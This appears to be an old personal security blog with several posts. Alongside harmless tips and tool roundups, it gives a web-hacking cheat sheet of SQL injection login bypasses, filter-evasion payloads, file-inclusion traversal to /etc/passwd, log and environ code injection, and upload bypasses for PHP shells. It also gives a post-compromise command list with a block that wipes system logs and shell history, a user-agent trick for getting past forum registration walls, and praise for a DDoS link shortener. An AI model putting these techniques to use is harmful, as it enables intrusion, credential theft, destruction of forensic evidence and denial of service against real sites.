Sunday 26 December 2010

Bypass web filters of Nepali ISPs

Well okay, I am here to rescue you if you are facing the problem of finding the website you want to visit getting blocked by the ISPs. After NTA sent the letters to the ISPs in Nepal to block the sites with some potentially bad contents, ISPs have started doing filtering and blocking of the websites. In this post, I am going to show you how to bypass the web filters being applied by the ISPs. I've tested with the websurfer ISP but still you might find one of these ways working for you.

Method #1:
So I assume you are searching for some stuffs in the torrent and lets say your search query goes to the URL.
For example, I search for sex comedy movie in torrentz.eu, the search query would result in a URL like:
http://torrentz.eu/search?f=sex+comedy+movie

Unfortunately websurfer blocks the keywork sex from the URL query so we get the page like below:


Now lets change our query by searching with the caps version of sex i.e. SEX to bypass such filtering. The new URL after entering search keywords would be:

http://torrentz.eu/search?f=SEX+comedy+movie

And this time you get the valid webpage with your expected search results. Wasn't that easy bypassing this lame blocking?
Method #2:
I was checking the lists of the websites which were being blocked by Nepali ISPs and my eyes caught utube.com and I tried opening it. But it was another site to be blocked.
Check the screenshot below:



This time I am using the internet protocol address (IP Address of the website) to visit the website. In order to find the IP of any website, you can simply do:

ping utube.com

This will give you the IP of the website. For utube.com, the associated IP was 67.192.184.210 so now on your browser, type the address of the website as http://67.192.184.210 and that would bypass and open the website.



Method #3:
Using proxy
While this tends to be slow for me, you can use the freely available proxies to bypass the web filters. I will leave this technique to do on your own as there are hundreds of tutorials on how to use proxies. Anyway, I leave you with the site called Samair.ru which consists of tons of proxies to be used.

Also, you might try installing the TOR software in your system(works pretty well for me).


Method #4:
Another way is to use the alternative DNS servers which will work perfectly if the ISP is blocking the websites based on DNS resolutions. You can use the DNS servers from OpenDNS or Google or you may google for other free DNS servers. Be sure to choose the good DNS server while doing so. The good thing about OpenDNS is that it also provides anti-phishing protection that your ISP might not be providing.

Google's DNS IPs: 8.8.8.8 and 8.8.4.4
OpenDNS IPs: 208.67.220.220 and 208.67.222.222

You can then set up the DNS servers either in router or your PC as required.

Method #5 and more:
I will update this post when I test things more and more. I haven't tested with VPNs, google cache, translators, etc. These days, ISPs are also blocking the websites by combining the above discussed methods further aided by the deep packet inspection.

I hope this helps some of you out there. Thanks.

Read more...

Web Hacking for Beginners and Intermediates

This is the article I posted on the secworm contest and I am now posting this in my blog. Its not that well written due to the lack of time but still will help some of you out there.

Hi all, I am Deadly Ghos7 aka sam207 and this is my article as the entry for the secworm contest #1. First, I would like to apologize for any kind of grammar mistakes in this article as there would be surely lots of grammatical errors in this article.

This article is not an article about teaching the basics of any web hacking techniques. Instead, it is the document of tips and tricks that the beginners and intermediates can make use of in order to attack the web applications on certain scenarios. I assume that you know the basics of the web hacking techniques or you could google for learning the basics. I'll be covering the tricks on different web hacking methods such as SQL injection(MySQL basically), insecure file inclusions, insecure file upload, etc. As already stated, the article won't be about basic but rather would present you few useful tricks that might be useful in the course of web-app pentesting.

SQL Injection:
Comments: - - , /* , #
MySQL version: SELECT @@version

Current SQL User: SELECT user()
SELECT system_user()

Current Database: SELECT database()

MySQL Data directory(location of MySQL data files): SELECT @@datadir

List all MySQL users: SELECT host, user, password FROM mysql.user

Bypass Quotes: SELECT pass FROM users WHERE user=0x2773616d32303727 --hex
SELECT pass FROM users WHERE user=char

Load local file: SELECT LOAD_FILE('/etc/passwd') --We can use quote bypassing here.

Create File with SQLi: SELECT * FROM table INTO dumpfile '/tmp/dump'
SELECT password FROM user INTO OUTFILE '/home/samar/www/dump.txt'
quote bypassing seems not working here. The path can't be encoded using the quote or char so we can't bypass the quote in this case.

Using limit: union all select null,table_name,null from information_schema.tables LIMIT 20,1
(useful when only one column is seen while doing SQLi)

unhex(hex()): union all select 1,concat(unhex(hex(username,0x3a,password))) from tblusers--

Bypassing filters:
uNiOn aLl SeLeCT 1,2 FrOm tbluser
/*!union*/ all select 1,2 from tbluser
union(select(null),table_name(from)(information_schema.tables)) --Bypassing the whitespace filter
0%a0union%a0select%091

XSS with SQLi (SIXSS): union all select 1,<script>alert(123)</script>

Login bypass:
'=' in both username and password field
' or 1='1'--
' or 1='1'/*
' or 1='1'#
' or 1='1';
In the username field and random password, it would bypass the vulnerable authentication login.

' /*or*/ 1='1 –Bypasses or filter


File Inclusion:
-> A sample vulnerable piece of code would be something like below: test.php


including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd

path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd

Nullbyte injection
test.php?page=../../../../../etc/passwd

Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/

PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php

Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
With more details on this, http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
Apache Log injection
test.php?page=../logs/access.log
You'll have to find the location of the log in order to include it. Also you should try including everything you can such as the session files, uploaded files, etc. For the apache log injection, you'll have to telnet and send the GET request for arbitrary PHP code like Get / Few apache log locations to try are as below:

Useragent
test.php?page=../../../../../../../proc/self/environ
Set your useragent to some php code and it will get executed if you are able to include the /proc/self/environ file.

Check existence of folder:
test.php?page=../../../../../folder/you/guess/../../../../../etc/passwd
Here the trick is basically using the path traversal method.

File upload:
Nullbyte injection: If only valid extensions(such as jpg, gif) are allowed, we can rename our shell to shell.php.jpg which will bypass the file upload security check.

PHP code within image: Sometimes the uploads are not checked for the file extension but for dimensions of images. This again can be bypassed by injecting PHP codes in the valid images and renaming them to .php file. The tool named edjpgcom can be used in order to inject the PHP code as JPEG comments in the images.

Header bypass: Again sometimes the developer just relies on the header information that contains the type of the file like “image/jpeg” for jpeg image. But since this is passed from client side, it can be modified using the tools such as tamper data or live http headers.

Also, the file upload feature can be exploited in union with the file inclusion vulnerability. If you have a site vulnerable to the file inclusion but not vulnerable to the insecure file upload, you can upload valid image as said in second method here and then you can include that file with the file inclusion vulnerable PHP script.

As said earlier, this article is not about giving you every steps of how to exploit the web vulnerabilities.



Read more...

Friday 24 December 2010

Browsing the restricted forums without registering

Well it has worked for me and I am posting how you can browse the restricted forums by misusing the SEO things(I guess). A website traffic hugely depends upon the google search and hence most of the websites allow the google bot to crawl and index their pages for appearing in the search result. Now the google bot useragent is allowed to crawl any restricted forum and hence they can index those pages.

The requirement is the useragent switcher add-on for firefox which can be downloaded from HERE. Install this addon and restart it.

Now in the firefox menu, under tools, you will see a new option Default User Agent from where you can choose different user agents and add new user agents. Among the available user agents, you will find the Google Bot 2.1 useragent under the Search Robots option. Choose the Google Bot 2.1 as your default user agent and now start visiting the forums that were asking you to register. It will also work on other types of websites which usually require login. I hope this helps you. Thanks :)

Read more...

Few useful commands to use on rooted Linux box

So I was just reading my backups and came across this text file and with the hope that this might be helpful, I am posting the list of few useful linux commands that you might be using after rooting a Linux box. Also, I am not responsible for anything and neither is the original author. Use the commands properly with the proper knowledge.

cat ./../mainfile.php - Config file.
ls -la - Lists directory's.
ifconfig {eth0 etc} - Ipconfig equiv.
ps aux - Show running proccess's.
gcc in_file -o out_file - Compile c file.
cat /etc/passwd - List's accounts.
sudo - Superuser Do run a command as root provided you have perms
in /etc/sudoers.
id - Tells you what user your logged in as.
which wget curl w3m lynx - Check's to see what downloaders are
present.
uname -r - Shows all release info (or) cat /etc/release.
uname -a - Shows all kernal info (or) cat /etc/issue
last -30 - Last logged 30 ip's can change to desired number.
useradd - Create new user account.
usermod - Modify user account.
w - See who is currently logged on.
locate password.txt - Locates password.txt in current dur can use *.
rm -rf / - Please be carefull with this command, i cannot stress this
enough.
arp -a - Lists other machines are on the same subnet.
lsattr -va - ls file attributes on linux second extended file system
find / -type f -perm -04000 -ls - Finds suid files.
find . -type f -perm -04000 -ls - Finds suid files in current dir.
find / -type f -perm -02000 -ls - Finds all sgid files.
find / -perm -2 -ls - Finds all writable files and folders.
find . -perm -2 -ls - Finds all writable files and folders in current dir.
find / -type f -name .bash_history - Finds bash history.
netstat -an | grep -i listen - shows open ports.
cut -d: -f1,2,3 /etc/passwd | grep :: - From memory creates a user
with no pass.
find /etc/ -type f -perm -o+w 2> /dev/null - Write in /etc/passwd?.
cat /proc/version /proc/cpuinfo - Cpu info.
locate gcc- Finds gcc if installed.
set - Display system variables.
echo $path- Echo current path.
lsmod- Dumps kernal modules.
mount/df- Check mounted file system.
rpm -qa- Check patch level for RedHat 7.0.
dmesg- Check hardware ino.
cat /etc/syslog.conf - Log file.
uptime - Uptime check.
cat /proc/meminfo - Memory check.
find / -type f -perm -4 -print 2> /dev/null- Find readble files.
find / -type f -perm -2 -print 2> /dev/null - Find writable files.
chmod ### $folder - Chmod folder.
ls -l -b - Verbosly list directory's

-------------clear-logs-----------------

rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c

find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;


Read more...

Thursday 23 December 2010

d0z.me: the Evil URL Shortener

Many of you might have heard about LOIC which has been used by kids to DDoS attack the sites. Now, the creative hacker Ben Schmidt (supernothing) of spareclockcycles.org has implemented the JS LOIC in order to use it for the DoS attacks.

Whenever the users visit the shortened URLs from d0z.me, the website being visited will be constantly sent the HTTP requests everytime, thus creating the DoS condition. So this can be utilized to create the botnet for the DDoS attack. Why not read the post from Ben Schmidt himself?

d0z.me: The Evil URL Shortener

d0z.me website

Read more...

Sunday 12 December 2010

Google Input Method: Type anywhere in your language

Google Transliteration IME is an input method editor which allows users to enter text in one of the supported languages using a roman keyboard. Users can type a word the way it sounds using Latin characters and Google Transliteration IME will convert the word to its native script. Note that this is not the same as translation -- it is the sound of the words that is converted from one alphabet to the other, not their meaning. Converted content will always be in Unicode.

Google Transliteration IME is currently available for 22 different languages - Amharic, Arabic, Bengali, Farsi (Persian), Greek, Gujarati, Hebrew, Hindi, Kannada, Malayalam, Marathi, Nepali, Oriya, Punjabi, Russian, Sanskrit, Serbian, Sinhalese, Tamil, Telugu, Tigrinya and Urdu.

You can download Google IME from the link below:

Google IME

Read more...

Saturday 11 December 2010

Safe URL shortening with Saf.li

Recently, there have been lots of misuse of the popular URL shortening services in order to infect the users with the malwares. I've been hating these URL shortening services but now Saf.li has arrived as a safe alternative for these URL shortening services.

Saf.li service checks the link for the malicious content using the Bitdefender antivirus. When using saf.li for URL shortening you get the added benefit of antivirus and antiphishing scans, which allow you and your friends to safely share content over the Internet. A saf.li check on your URL means that all those who are going to use it are safe from malware and from personal data theft attempts.

Saf.li

Read more...

Avoiding the Man In The Middle through ARP Spoofing/Poisoning

ArpON (Arp handler inspectiON) is a portable handler daemon that make ARP secure in order to avoid the Man In The Middle through ARP Spoofing/Poisoning. It detects and blocks also Man In The Middle through ARP Spoofing/Poisoning for DHCP Spoofing, DNS Spoofing, WEB Spoofing, Session Hijacking and SSL/TLS Hijacking & co attacks.

This is possible using two kinds of anti ARP Poisoning tecniques: the first is based on SARPI or "Static Arp Inspection" the second on DARPI or "Dynamic Arp Inspection" approach. SARPI and DARPI protects both unidirectional, bidirectional and distributed attacks.

Into "Unidirectional protection" is required that ArpON is installed and running on one node of the connection attacked. Into "Bidirectional protection" is required that ArpON is installed and running on two nodes of the connection attacked. Into "Distributed protection" is required that ArpON is installed and running on all nodes of the connections attacked. All other nodes whitout ArpON will not be protected from attack.

ArpON is therefore a host-based solution that doesn't modify ARP's standard base protocol, but rather sets precise policies by using SARPI for static networks and DARPI for dynamic networks (DHCP) thus making today's standardized protocol working and secure from any foreign intrusion.

Third party solutions exist, but all of them have some weaknesses, weaknesses which aren't present in ArpON.
Some examples:

1) Arpwatch: detects foreign intrusions but doesn't block them;
2) S-Arp (Secure ARP) slows down the protocol by injecting additional headers, encrypting communication and thus requiring more computational power;
3) DAI (Dynamic ARP inspection) from Cisco, ProCurve, Extreme Networks, Dlink and Allied Telesis slows down the protocol by making multiple DHCP server interrogations (DHCP Snooping) thus requiring more computational power;
4) IEEE 802.1AE, slows down the protocol by making massive use of encryption thus requiring more computational power.

Keep in mind other common tools fighting ARP poisoning usually limit their activity only to point out the problem instead of blocking it, ArpON does it using SARPI and DARPI policies. Finally you can use ArpON to pentest some switched/hubbed LAN with/without DHCP protocol, in fact you can disable the daemon in order to use the tools to poison the ARP cache.

Features:
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning attacks in statically configured networks;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning attacks in dinamically configured (DHCP) networks;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for DHCP Spoofing attack;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for DNS Spoofing attack;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for WEB Spoofing attack;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for Session Hijacking attack;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for SSL/TLS Hijacking attack;
- It detects and blocks unidirectional, bidirectional and distributed attacks;
- Doesn't affect the communication efficiency of Arp protocol;
- Multithreading on all OS supported (Pthread lib);
- It manages the network interface into unplug, boot, hibernation and suspension OS features;
- It works in userspace for OS portability reasons;
- Easily configurable via command line switches, provided that you have root permissions;
- It replaces Arpwatch, DAI (Dynamic ARP Inspection), S-ARP (Secure-ARP), IEEE 802.1AE & co;
- Tested against Ettercap, Cain & Abel, dsniff and other tools.

Download ArpON

Read more...

Wi-fEye - Automated Network penetration testing tool

Wi-fEye is designed to help with network penetration testing, Wi-fEye will allow you to perform a number of powerful attacks Automatically, all you have to do is to lunch Wi-fEye, choose which attack to perform, select your target and let Wi-fEye do the magic !!.

Wi-fEye is divided to four main menus:
1. Cracking menu: This menu will allow you to:

* Enable monitor mode
* View avalale Wireless Networks
* Launch Airodump-ng on a specific AP
* WEP cracking: this will allow you to perform the following attacks automatically:

o Interactive packet replay.
o Fake Authentication Attack.
o Korek Chopchop Attack.
o Fragmentation Attack.
o Hirte Attack (cfrag attack).
o Wesside-ng.
* WPA Cracking: This contains the following attacks:
o Wordlist Attack
o Rouge AP Attack.

2. Mapping: this menu will allow you to do the following:

* Scan the network and view the connected hosts.
* Use Nmap Automatically.

3. MITM: this menu will allow you to do the following Automatically:

* Enable IP forwarding.
* ARP Spoof.
* Launch ettercap (Text mode).
* Sniff SSL/HTTPS traffic.
* Sniff URLs and send them to browser.
* Sniff messengers from instant messengers.
* Sniff images.
* DNS Spoof.
* HTTP Session Hijacking (using Hamster).

4. Others: this menu will allow you to o the following automatically:

* Change MAC Address.
* Hijack software updates (using Evilgrade).

Download Wi-fEye tool
Documentation for Wi-fEye tool

Read more...

Friday 10 December 2010

Rename file extension of multiple files at once

Sometimes, you might need to rename the file extension of multiple files and this can be simply accomplished from command line without the use of any tools.

In the command prompt, move to the proper directory containing the files whose extension is to be renamed. Then type as following in the command prompt.
ren *.jpg *.exe

The above command will rename all the jpg files in that folder to exe. Similar command rename exists in the linux to achieve the same effect. Hope this comes to be handy for you.

Read more...

Fix Alt+PrintScreen Shortcut for Current Window Screenshot not working

Today, I was trying to get the screenshot of the current window and found that the Alt+PrintScreen was not working. The solution for this problem is as below:

To solve this problem, you need to do as following:

$ sudo gedit /etc/sysctl.conf

Just add the following line in this file.

kernel.sysrq = 0

This should solve the problem. Hope this helps. :)

Read more...

RIPS - PHP Static Source Code Analyzer

RIPS is a static source code analyser for vulnerabilities in PHP webapplications. It was released during the Month of PHP Security (www.php-security.org).

In this submission a tool named RIPS is introduced which automates the process of identifying potential security flaws in PHP source code by using static source code analysis. RIPS is open source and freely available at http://www.sourceforge.net/projects/rips-scanner/. The result of the analysis can easily be reviewed by the penetration tester in its context without reviewing the whole source code again. Given the limitations of static source code analysis, a vulnerability needs to be confirmed by the code reviewer.

Read more...

Cracking password protected ZIP archives with fcrackzip under linux

If you are looking for password protected zip archive cracker for linux, fcrackzip is the tool that can be used for the purpose.

fcrackzip is a fast password cracker partly written in assembler. It is able to crack password protected zip files with brute force or dictionary based attacks, optionally testing with unzip its results. It can also crack cpmask'ed images.

To install it, type the following in terminal

$ sudo apt-get install fcrackzip

Read more...

Saturday 4 December 2010

Antivirus Softwares for Linux

The myth of Linux being insecure is not true but it is said so due to the fact that it is not that widely used and not much used in the enterprises and homes but still they are not full proof so some antivirus protection for you Linux system might be obtained with any of the following softwares.

1) ClamAV: Clam AntiVirus is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways. It provides a number of utilities including a flexible and scalable multi-threaded daemon, a command line scanner and advanced tool for automatic database updates. The core of the package is an anti-virus engine available in a form of shared library.
ClamAV Home

2) Bitdefender AV Scanner: BitDefender Antivirus Scanner for Unices is a versatile on-demand scanner for Linux and FreeBSD systems. The stand-alone scanner protects both UNIX-based and Windows-based disk partitions by scanning for viruses and spyware. Easy to use graphical user interface complements a powerful command line interface that fully supports operating system’s scripting tools.
Bitdefender AV Scanner for Unices

3) AVG: Basic antivirus protection for Linux/FreeBSD available to download for free. Free virus protection for your PC. For private and non-commercial use only.
AVG

4) avast! Linux Home Edition: avast! Linux Home Edition represents an antivirus solution for the increasingly popular Linux platform. The Home Edition is offered free of charge but only for home, non-commercial use.
Avast! Linux Home Edition

5) F-Prot AV: F-PROT Antivirus for Linux was especially developed to effectively eradicate viruses threatening workstations running Linux. It provides full protection against macro viruses and other forms of malicious software - including Trojans.
F-Prot AV

Any other additions, feel free to comment here.

Read more...

Wednesday 1 December 2010

Online typing speed test

I remembered this site which I used to try in my old days when computers were new to me. The speed testing feature from this site seems to be reliable and today I was just seeing how fast my fingers go in this freezing cold weather.

http://speedtest.10-fast-fingers.com/

67 words

Lol I lost my speed due to freezing cold weather out here in Nepal :P

Read more...

Probably the best free security list in the world

Just found this webpage when I was browsing; this page enlists many security tools under different categories which might be useful for you. So I just thought to share the page here.

Probably the best free security list in the world page

the list consists of the security tools under following categories:

* Realtime protection
* Scanners
* Tools for virus removal
* Online-scanners
* Firewalls
* HIPS
* System hardening-HIPS
* System hardening
* Sandboxing/virtualization
* Vulnerability scanning and updates
* Browser security
* IP-blocking/hardening
* What's new
* Privacy
* System monitoring
* Network traffic monitoring
* System cleaning
* Data rescue
* Encrypting
* Backup
* System rescue
* Miscellaneous
* Tests and malware analysis tools
* Vista/Windows 7 specific security
* Prisoners on remand
* Doing time in jail


Read more...

Speeding up opening of Acrobat Reader

Whenever you launch acrobat reader, it takes some extra times while loading the plugins and we rarely use those plugins(In fact, I rarely use them) so we can speed up the opening of acrobat reader.

The trick in speeding up the process of opening acrobat reader is by removing the plugins from plugins folder and putting them in the folder called optional. First, go to the acrobat reader installation directory which will be probably located somewhere at

C:\program files\adobe\

There, you will see the folder called plugins. What you have to do is cut and paste all the items from plugins folder to optional folder. Make sure that you are not locking any of those files by opening the acrobat reader while doing cut/paste. Hope this helps you. :)

Read more...